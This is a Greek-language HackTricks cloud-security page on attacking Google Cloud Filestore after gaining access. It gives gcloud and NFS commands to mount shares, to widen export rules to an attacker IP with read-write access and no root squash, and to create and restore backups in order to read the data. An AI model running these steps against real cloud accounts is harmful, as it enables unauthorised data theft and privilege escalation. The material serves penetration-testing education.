GCP - Filestore Post Exploitation

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Filestore

Για περισσότερες πληροφορίες σχετικά με το Filestore δείτε:

GCP - Filestore Enum

Προσάρτηση Filestore

Ένα κοινόχρηστο σύστημα αρχείων μπορεί να περιέχει ευαίσθητες πληροφορίες που είναι ενδιαφέρουσες από την οπτική ενός επιτιθέμενου. Με πρόσβαση στο Filestore είναι δυνατό να το προσάρτησετε:

Προσάρτηση του συστήματος αρχείων Filestore ```bash sudo apt-get update sudo apt-get install nfs-common # Check the share name showmount -e # Mount the share mkdir /mnt/fs sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs ```

Για να βρείτε τη διεύθυνση IP μιας Filestore instance, ελέγξτε την ενότητα enumeration της σελίδας:

GCP - Filestore Enum

Αφαίρεση περιορισμών και απόκτηση επιπλέον permissions

Αν ο attacker δεν βρίσκεται σε διεύθυνση IP με πρόσβαση στο share, αλλά έχετε αρκετά permissions για να το τροποποιήσετε, είναι δυνατό να αφαιρεθούν οι περιορισμοί ή η πρόσβαση σε αυτό. Επίσης είναι δυνατό να χορηγηθούν περισσότερα προνόμια στη διεύθυνση IP σας ώστε να αποκτήσετε admin πρόσβαση στο share:

Ενημέρωση Filestore instance για να επιτραπεί η πρόσβαση ```bash gcloud filestore instances update nfstest \ --zone= \ --flags-file=nfs.json

Contents of nfs.json

{ “–file-share”: { “capacity”: “1024”, “name”: “”, “nfs-export-options”: [ { “access-mode”: “READ_WRITE”, “ip-ranges”: [ “/32” ], “squash-mode”: “NO_ROOT_SQUASH”, “anon_uid”: 1003, “anon_gid”: 1003 } ] } }

</details>

### Επαναφορά αντιγράφου ασφαλείας

Εάν υπάρχει αντίγραφο ασφαλείας, είναι δυνατό να το **επαναφέρετε** σε μια υπάρχουσα ή σε μια νέα instance, ώστε οι **πληροφορίες του να γίνουν προσβάσιμες:**

<details>

<summary>Δημιουργία νέας instance και επαναφορά αντιγράφου ασφαλείας</summary>
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Δημιουργία αντιγράφου ασφαλείας και επαναφορά

Εάν δεν έχετε πρόσβαση σε ένα share και δεν θέλετε να το τροποποιήσετε, είναι δυνατό να δημιουργήσετε ένα αντίγραφο ασφαλείας του και να το επαναφέρετε όπως περιγράφηκε προηγουμένως:

Δημιουργία αντιγράφου ασφαλείας και επαναφορά σε νέο instance ```bash # Create share backup gcloud filestore backups create \ --region= \ --instance= \ --instance-zone= \ --file-share=

Follow the previous section commands to restore it and mount it

</details>

> [!TIP]
> Μάθετε & εξασκηθείτε στο AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Μάθετε & εξασκηθείτε στο GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Μάθετε & εξασκηθείτε στο Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Υποστηρίξτε το HackTricks</summary>
>
> - Δείτε τα [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Εγγραφείτε στο** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) ή την [**telegram group**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>